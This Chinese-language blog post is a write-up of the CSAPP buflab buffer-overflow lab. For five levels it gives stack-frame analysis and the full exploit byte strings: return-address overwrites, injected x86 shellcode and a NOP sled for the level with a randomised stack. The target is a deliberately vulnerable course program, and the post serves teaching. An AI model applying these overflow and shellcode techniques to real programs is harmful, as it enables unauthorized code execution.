<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>CSAPP-buflab | zww</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="CSAPP-buflab缓冲区溢出实验">
<meta name="keywords" content="CSAPP,缓冲区溢出">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAPP-buflab">
<meta property="og:url" content="http://yoursite.com/2019/06/03/CSAPP-buflab/index.html">
<meta property="og:site_name" content="zww">
<meta property="og:description" content="CSAPP-buflab缓冲区溢出实验">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture1.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture4.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture0.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture2.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture3.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture4.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture5.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture7.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture8.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture10.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture11.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture14.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture15.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture17.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture18.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture15.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture21.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture23.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture24.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture25.png">
<meta property="og:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture26.png">
<meta property="og:updated_time" content="2019-06-06T13:42:46.871Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CSAPP-buflab">
<meta name="twitter:description" content="CSAPP-buflab缓冲区溢出实验">
<meta name="twitter:image" content="http://yoursite.com/2019/06/03/CSAPP-buflab/Picture1.png">
  
    <link rel="alternate" href="/atom.xml" title="zww" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">zww</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-CSAPP-buflab" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/06/03/CSAPP-buflab/" class="article-date">
  <time datetime="2019-06-03T04:35:13.000Z" itemprop="datePublished">2019-06-03</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CSAPP-buflab
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><strong>CSAPP-buflab缓冲区溢出实验</strong><br><a id="more"></a></p>
<h3 id="先决条件："><a href="#先决条件：" class="headerlink" title="先决条件："></a>先决条件：</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture1.png" alt></p>
<p>因为getbuf函数在使用gets读取字符，并赋值给buf数组时，没有进行长度的检查，导致可以输入任意多的字符，实现缓冲区的溢出漏洞的利用和攻击</p>
<p><strong>getbuf中buf首地址</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture4.png" alt></p>
<p><strong>函数调用-栈帧</strong><br><img src="/2019/06/03/CSAPP-buflab/Picture0.png" alt></p>
<h3 id="level0-Candle"><a href="#level0-Candle" class="headerlink" title="level0: Candle"></a>level0: Candle</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture2.png" alt><br><img src="/2019/06/03/CSAPP-buflab/Picture3.png" alt></p>
<p><strong>任务：</strong></p>
<p>当getbuf执行完后，需要返回到smoke函数而不是test函数。同时也不用担心test栈帧的损坏，因为smoke函数中有exit可以退出程序。</p>
<p><strong>原理：</strong></p>
<p>当test调用getbuf函数后，程序会开启一个新的栈帧</p>
<p>而程序在执行完getbuf函数后，按照原有的步骤是收回getbuf的栈帧，并恢复test函数的栈帧</p>
<p>所以我们只需要在getbuf的栈帧进行回收的时候，将其跳转地址改为getbuf即可</p>
<p>通过调试，找到buf数组的首地址为<strong>ebp-0x28</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture4.png" alt></p>
<p>那么buf栈帧中<strong>ebp-0x29</strong>到<strong>ebp-0x2c</strong>为保存的旧的ebp，</p>
<p><strong>ebp-0x2d</strong>到<strong>ebp-0x30</strong>为getbuf函数的返回地址<img src="/2019/06/03/CSAPP-buflab/Picture5.png" alt></p>
<p>虽然说0x08048e0a为smoke的地址，但是因为0x0a是换行符，会被gets函数认为是字符串的结束，导致exp不完整，所以需要向下取地址</p>
<p><strong>exp：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 </span><br><span class="line">0b 8e 04 08</span><br></pre></td></tr></table></figure></p>
<h3 id="level1-Sparkler"><a href="#level1-Sparkler" class="headerlink" title="level1: Sparkler"></a>level1: Sparkler</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture7.png" alt></p>
<p><strong>任务：</strong></p>
<p>与level0相似的功能，但是需要传递给fizz的参数val为你自己的cookies</p>
<p><strong>原理：</strong></p>
<p>程序在进行函数调用的过程中，如果需要进行参数的传递，会将需要传递的参数放在调用者的栈帧中，然后再进行函数的调用</p>
<p>所以在这里只需要找到传递参数val在被调用者栈帧中的位置即可（ebp+0x8）</p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture8.png" alt></p>
<p><strong>exp:</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 </span><br><span class="line">af 8d 04 08 </span><br><span class="line">30 31 32 33 </span><br><span class="line">64 84 36 37</span><br></pre></td></tr></table></figure></p>
<p>0x08038daf为fizz函数的地址，0x37368464为cookies</p>
<h3 id="level2-Firecracker"><a href="#level2-Firecracker" class="headerlink" title="level2: Firecracker"></a>level2: Firecracker</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture10.png" alt><br><img src="/2019/06/03/CSAPP-buflab/Picture11.png" alt></p>
<p><strong>任务：</strong></p>
<p>与level1相似，但是需要设置全局变量global_value的值为cookies，并需要跳转到bang函数</p>
<p><strong>原理：</strong></p>
<p>模拟寄存器来设置全局变量global_value和函数返回</p>
<p><strong>shellcode：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">movl $0x37368464,%eax</span><br><span class="line">movl %eax,0x0804d10c</span><br><span class="line">push $0x08048d52</span><br><span class="line">ret</span><br></pre></td></tr></table></figure></p>
<p><strong>字节码：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b8 64 84 36 37</span><br><span class="line">a3 0c d1 04 08</span><br><span class="line">68 52 8d 04 08</span><br><span class="line">c3</span><br></pre></td></tr></table></figure></p>
<p>因为需要执行字节码的功能，所以要将返回值更改为buf数组的首地址</p>
<p>执行完全局变量的赋值操作后，将bang函数的首地址推入栈，再ret，即能返回到bang函数中</p>
<p><strong>bang首地址：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture14.png" alt></p>
<p><strong>buf首地址：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture15.png" alt></p>
<p><strong>exp:</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">b8 64 84 36 37</span><br><span class="line">a3 0c d1 04 08</span><br><span class="line">68 52 8d 04 08</span><br><span class="line">c3</span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 </span><br><span class="line">30 31 32 33</span><br><span class="line">68 3a 68 55</span><br></pre></td></tr></table></figure></p>
<p>字节码16 + 28 + 返回地址4 = 48</p>
<h3 id="level3-Dynamite"><a href="#level3-Dynamite" class="headerlink" title="level3: Dynamite"></a>level3: Dynamite</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture17.png" alt></p>
<p><strong>任务：</strong></p>
<p>要求调用getbuf后，返回到test当中，但是不能破坏为test函数维护的堆栈状态（test函数加了堆栈状态检测），同时要让test函数调用getbuf后的返回值（val）为自己的cookie。</p>
<p><strong>原理：</strong></p>
<p>因为函数调用后的返回值保存在eax中，所以可以模拟寄存器将cookies写入eax中</p>
<p>调用getbuf函数后的返回地址(0x08048e50)：<br><img src="/2019/06/03/CSAPP-buflab/Picture18.png" alt></p>
<p><strong>shellcode：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movl $0x37368464,%eax</span><br><span class="line">push $0x08048e50</span><br><span class="line">ret</span><br></pre></td></tr></table></figure></p>
<p><strong>字节码：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">b8 64 84 36 37</span><br><span class="line">68 50 8e 04 08</span><br><span class="line">c3</span><br></pre></td></tr></table></figure></p>
<p>同时要保持test栈帧的完整性，也就是在执行完exp后pc要返回到test栈帧中调用getbuf函数的下一个地址，保证test函数的正常运行和结束</p>
<p><strong>buf首地址：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture15.png" alt></p>
<p><strong>test栈帧中的ebp（保存的旧的ebp）：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture21.png" alt></p>
<p><strong>exp：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">b8 64 84 36 37</span><br><span class="line">68 50 8e 04 08</span><br><span class="line">c3</span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 39 </span><br><span class="line">30 31 32 33 34 35 36 37 38 </span><br><span class="line">c0 3a 68 55</span><br><span class="line">68 3a 68 55</span><br></pre></td></tr></table></figure></p>
<h3 id="level4-Nitroglycerin"><a href="#level4-Nitroglycerin" class="headerlink" title="level4: Nitroglycerin"></a>level4: Nitroglycerin</h3><p><img src="/2019/06/03/CSAPP-buflab/Picture23.png" alt></p>
<p><strong>任务：</strong></p>
<p>因为程序在运行的过程中，对于每一个用户而言，其对应的栈指针的位置其实大概率是不相同的</p>
<p>在这一题中，使用的是testn和getbufn函数，testn调用5次getbufn函数，每次调用getbufn函数时，其栈基址ebp是随机分配的</p>
<p>调用5次getbufn函数中，每次都要正确返回到testn函数中，返回值为cookies，并且不能破坏testn的栈帧</p>
<p><strong>步骤：</strong></p>
<p>参考nop<br>sleds的原理和攻击方法，在需要执行的shellcode前加入大量的nop指令，只需要返回地址返回到nop指令中，那么就能够经过一系列的nop操作滑行到我们最终需要执行的shellcode中，执行shellcode命令</p>
<p>只需要找到每次调用getbufn中的buf数组的最高首地址即可（buf数组为520字节）</p>
<p>同时因为ebp的随机化，我们只能使用ebp与esp的相对位置来确定ebp</p>
<p><strong>调用getbufn后的返回地址：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture24.png" alt></p>
<p><strong>最大地址：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture25.png" alt><br>最大地址为0x556838e8</p>
<p><strong>esp与ebp的相对位置：</strong></p>
<p><img src="/2019/06/03/CSAPP-buflab/Picture26.png" alt><br>push ebx 后ebp与esp差4，sub esp 0x24后ebp与esp差0x28</p>
<p><strong>shellcode：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">movl $0x37368464,%eax</span><br><span class="line">lea 0x28(%esp),%ebp</span><br><span class="line">push $0x8048ce2</span><br><span class="line">ret</span><br></pre></td></tr></table></figure></p>
<p><strong>字节码：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">b8 64 84 36 37 </span><br><span class="line">8d 6c 24 28 </span><br><span class="line">68 e2 8c 04 08 </span><br><span class="line">c3</span><br></pre></td></tr></table></figure></p>
<p><strong>exp：</strong><br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90</p>
<p>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90</p>
<p>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90</p>
<p>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90</p>
<p>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90<br>90 90 90 90 90 90 90 90 90 90</p>
<p>90 90 90 90 90 90 90 90 90 </p>
<p>b8 64 84 36 37<br>8d 6c 24 28<br>68 e2 8c 04 08<br>c3 </p>
<p>e8 38 68 55</p>
<p>509nop指令 + 15字节码 + 4最大返回地址 = 528</p>
<p>在getbufn执行完leave和ret后，需要将ebp和esp恢复到他们在testn栈帧中的原来的位置，但是因为ebp是变化的，所以需要使用esp和ebp的相对位置来确定ebp的位置。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/06/03/CSAPP-buflab/" data-id="ck47u3whv0003j2xfalljokpk" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CSAPP/">CSAPP</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/缓冲区溢出/">缓冲区溢出</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/06/06/ciscn2019/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          ciscn2019 writeup
        
      </div>
    </a>
  
  
    <a href="/2019/05/26/RCTF2019/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">RCTF2019 writeup</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/802-11/">802.11</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CSAPP/">CSAPP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Cybrics/">Cybrics</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ELF/">ELF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Jarvisoj/">Jarvisoj</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OS/">OS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RCTF/">RCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RSA/">RSA</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Rabin/">Rabin</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Ruby/">Ruby</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SCTF/">SCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SMTP/">SMTP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSTI/">SSTI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XML/">XML</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ciscn/">ciscn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/disk/">disk</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/jwt/">jwt</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/make/">make</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php7-4/">php7.4</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/qwb/">qwb</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/smarty3-1-30/">smarty3.1.30</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/thinkphp/">thinkphp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ucore/">ucore</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/unserialize/">unserialize</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wireshark/">wireshark</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/反弹shell/">反弹shell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/文件包含/">文件包含</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/缓冲区溢出/">缓冲区溢出</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/802-11/" style="font-size: 10px;">802.11</a> <a href="/tags/CSAPP/" style="font-size: 10px;">CSAPP</a> <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Cybrics/" style="font-size: 10px;">Cybrics</a> <a href="/tags/ELF/" style="font-size: 10px;">ELF</a> <a href="/tags/Jarvisoj/" style="font-size: 10px;">Jarvisoj</a> <a href="/tags/OS/" style="font-size: 10px;">OS</a> <a href="/tags/PHP/" style="font-size: 15px;">PHP</a> <a href="/tags/RCTF/" style="font-size: 10px;">RCTF</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/Rabin/" style="font-size: 10px;">Rabin</a> <a href="/tags/Ruby/" style="font-size: 10px;">Ruby</a> <a href="/tags/SCTF/" style="font-size: 10px;">SCTF</a> <a href="/tags/SMTP/" style="font-size: 10px;">SMTP</a> <a href="/tags/SSTI/" style="font-size: 10px;">SSTI</a> <a href="/tags/XML/" style="font-size: 10px;">XML</a> <a href="/tags/XXE/" style="font-size: 10px;">XXE</a> <a href="/tags/ciscn/" style="font-size: 10px;">ciscn</a> <a href="/tags/disk/" style="font-size: 10px;">disk</a> <a href="/tags/jwt/" style="font-size: 10px;">jwt</a> <a href="/tags/make/" style="font-size: 10px;">make</a> <a href="/tags/php7-4/" style="font-size: 10px;">php7.4</a> <a href="/tags/qwb/" style="font-size: 10px;">qwb</a> <a href="/tags/smarty3-1-30/" style="font-size: 10px;">smarty3.1.30</a> <a href="/tags/thinkphp/" style="font-size: 10px;">thinkphp</a> <a href="/tags/ucore/" style="font-size: 10px;">ucore</a> <a href="/tags/unserialize/" style="font-size: 10px;">unserialize</a> <a href="/tags/wireshark/" style="font-size: 10px;">wireshark</a> <a href="/tags/反弹shell/" style="font-size: 10px;">反弹shell</a> <a href="/tags/文件包含/" style="font-size: 10px;">文件包含</a> <a href="/tags/缓冲区溢出/" style="font-size: 10px;">缓冲区溢出</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/05/">May 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/12/14/tps/">thinkphps</a>
          </li>
        
          <li>
            <a href="/2019/11/16/smarty/">smarty</a>
          </li>
        
          <li>
            <a href="/2019/11/10/ucore-lab1/">ucore-lab1</a>
          </li>
        
          <li>
            <a href="/2019/07/29/XXE/">XXE原理及实现</a>
          </li>
        
          <li>
            <a href="/2019/07/25/RSA-Rabin/">RSA_Rabin</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 WenWei Zeng<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>